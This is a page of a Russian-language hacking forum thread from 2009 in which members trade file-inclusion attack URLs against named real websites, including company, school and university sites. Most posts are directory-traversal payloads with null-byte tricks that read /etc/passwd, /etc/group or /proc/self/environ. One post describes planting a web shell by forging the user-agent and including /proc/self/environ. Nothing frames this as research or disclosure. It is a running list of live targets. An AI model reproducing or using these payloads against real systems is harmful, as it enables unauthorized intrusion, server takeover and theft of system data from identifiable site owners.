PHP Иньекции

Discussion in 'Уязвимости' started by Joker-jar, 20 Apr 2007.

Page 48 of 72
  1. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://www.halalapalooza.com/d.php?id=[LFI]
     
    #941 mailbrush, 13 Aug 2009
  2. pi7dets

    pi7dets New Member

    Joined:
    14 Aug 2009
    Messages:
    2
    Likes Received:
    1
    Reputations:
    0
    Code:
    http://www.ksu.ru/f9/k2/new/phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc/passwd%00
    PR7, тИЦ 2100
     
    #942 pi7dets, 14 Aug 2009
    1 person likes this.
  3. BHYCHIK

    BHYCHIK Member

    Joined:
    30 Jan 2009
    Messages:
    52
    Likes Received:
    28
    Reputations:
    9
    Пхп-инъекция на сайте aphorism-list.com с возможностью залить шелл.

    http://aphorism-list.com/frasy.php?page=../../../../../../../../../../../../../../../../../../../etc/passwd%00
    http://aphorism-list.com/frasy.php?page=../../../../../../../../../../../../../../../../../../../proc/self/environ%00

    Шел без проблем льется при подмене user-agent и инклудом /proc/self/environ (кто читал последнего хакера точно поймет)

    Кстати, на хостинге лежит дистрибутив windows xp sp3)

    И еще, подскажите, почему не всегда можно заинклудить /proc/self/environ (естественно системы никсовые)? Прав не хватает?
     
    #943 BHYCHIK, 15 Aug 2009
    5 people like this.
  4. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    http://www.leonardo-co.com/index.php?folder=Career&page=../../../../../../../../../../etc/passwd
    http://www.bonnarealty.com/home.php?inc=../../../../../../../../etc/passwd
     
    #944 geezer.code, 15 Aug 2009
    1 person likes this.
  5. BHYCHIK

    BHYCHIK Member

    Joined:
    30 Jan 2009
    Messages:
    52
    Likes Received:
    28
    Reputations:
    9
    http://www.tallinnamerepaevad.ee/est.php?page=../../../../../../../../../../etc/passwd%00
     
    #945 BHYCHIK, 16 Aug 2009
  6. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://stanleycup.crash.sk/sc.php?id=[color="red"][LFI][/color]
    Code:
    http://www.dalcomstechnologies.com/pricing.php?id=[color="Red"][LFI][/color]
     
    #946 mailbrush, 16 Aug 2009
  7. BHYCHIK

    BHYCHIK Member

    Joined:
    30 Jan 2009
    Messages:
    52
    Likes Received:
    28
    Reputations:
    9
    http://www.pillows.jp/20th/p/index.php?page=../../../../../../../../../../../../etc/passwd%00
     
    #947 BHYCHIK, 17 Aug 2009
  8. BHYCHIK

    BHYCHIK Member

    Joined:
    30 Jan 2009
    Messages:
    52
    Likes Received:
    28
    Reputations:
    9
    Инъекции на 2ух японских сайтах

    http://www.holos.jp/index.php?page=../../../../../../../../../../../../../../../../../../../../../../etc/group

    http://mobasp.jp/page.php?cat=../../../../../../../../../../../../../../../../../../../../etc/passwd
     
    #948 BHYCHIK, 18 Aug 2009
    1 person likes this.
  9. 5rap

    5rap Banned

    Joined:
    27 Jun 2009
    Messages:
    63
    Likes Received:
    48
    Reputations:
    0
    Опять решил полазить поискать php inj:

    http://www.fitnessmanager.ru/index.php?page=../../../../../../../etc/passwd
     
    #949 5rap, 19 Aug 2009
    Last edited by a moderator: 19 Aug 2009
    1 person likes this.
  10. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    Code:
    http://www.handballneuchatel.ch/httpdocs/index.php?inc=../../../etc/passwd%00
    Code:
    http://www.robotsandbotanics.de/index.php?inc=../../../../../../../../etc/passwd%00
    Code:
    http://www.tasteone-medientechnik.de/index.php?inc=../../../../../../../etc/passwd%00
    Code:
    http://www.haldergmbh.de/index.php?inc=/etc/passwd
    Code:
    http://blesk.issa.cz/index.php?inc=index.php%00
     
    #950 RulleR, 20 Aug 2009
  11. dr.Web

    dr.Web Member

    Joined:
    2 Feb 2009
    Messages:
    7
    Likes Received:
    22
    Reputations:
    10
    http://wow.crpg.ru/modules.php?op=modload&name=..&file=index
    просмотр файлов
     
    #951 dr.Web, 20 Aug 2009
  12. monolog

    monolog Banned

    Joined:
    15 Aug 2009
    Messages:
    7
    Likes Received:
    7
    Reputations:
    5
    Code:
    http://iea.uoregon.edu/page.php?query=static&file=/../../../../../../../../../../../../../etc/passwd
http://occs.odu.edu/page.php?page=news_security/../../../../../../../../../../../../../../../../../../../../etc/passwd
http://languagesupport.msu.edu/page.php?toggle=5&id=SectionProfDev/../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
     
    #952 monolog, 20 Aug 2009
    3 people like this.
  13. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://www.lambproject.org/content.php?tt=../../../../../../etc/passwd&pc1=&pc2=spacer&pc3=spacer&origin=
     
    _________________________
    #953 HAXTA4OK, 23 Aug 2009
    3 people like this.
  14. Fuckel

    Fuckel Banned

    Joined:
    16 Jan 2008
    Messages:
    274
    Likes Received:
    59
    Reputations:
    6
    http://www.veye.com.ua/doc.php?d=../
     
    #954 Fuckel, 23 Aug 2009
  15. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    Code:
    http://www.emini-collection.ch/index.php?file=../../../../etc/passwd%00
    Code:
    http://www.jolly-dent.de/index.php?file=/etc/passwd%00
    Code:
    http://www.e-medica.jp/index.php?file=../../../../../etc/passwd%00
     
    #955 RulleR, 24 Aug 2009
    Last edited: 24 Aug 2009
    2 people like this.
  16. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://www.eximoforta.ru/index.php?file=index.php цикл index.php
     
    _________________________
    #956 HAXTA4OK, 24 Aug 2009
    1 person likes this.
  17. Joker-jar

    Joker-jar Elder - Старейшина

    Joined:
    11 Mar 2007
    Messages:
    581
    Likes Received:
    205
    Reputations:
    37
    http://www.ruspi.ru./?page=[local]
     
    #957 Joker-jar, 28 Aug 2009
  18. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    Code:
    http://www.ie.rmutk.ac.th/index.php?file=../../../../../../../etc/passwd
    Code:
    http://www.cdu-rhauderfehn.de/index.php?folder=pages&file=../../../../../../../etc/passwd
     
    #958 z00MAN, 28 Aug 2009
  19. Swift

    Swift Banned

    Joined:
    27 Oct 2008
    Messages:
    78
    Likes Received:
    156
    Reputations:
    8
    Code:
    http://yuanpei.pku.edu.cn/old/index.php?option=com_content&task=view&id=[RFI]
     
    #959 Swift, 29 Aug 2009
  20. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    http://www.tzimakos.gr/print.php?id=/proc/self/environ

    http://my.getmorediamonds.com/getstarted.php?id=index.php&url=../../../../../../etc/passwd

    http://www.joeplecker.com/display.php?id=/proc/self/environ

    http://petercottontailpreschool.com/index.php?id=/etc/passwd
     
    #960 ph1l1ster, 30 Aug 2009
    Last edited: 30 Aug 2009
(You must log in or sign up to post here.)
Page 48 of 72
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.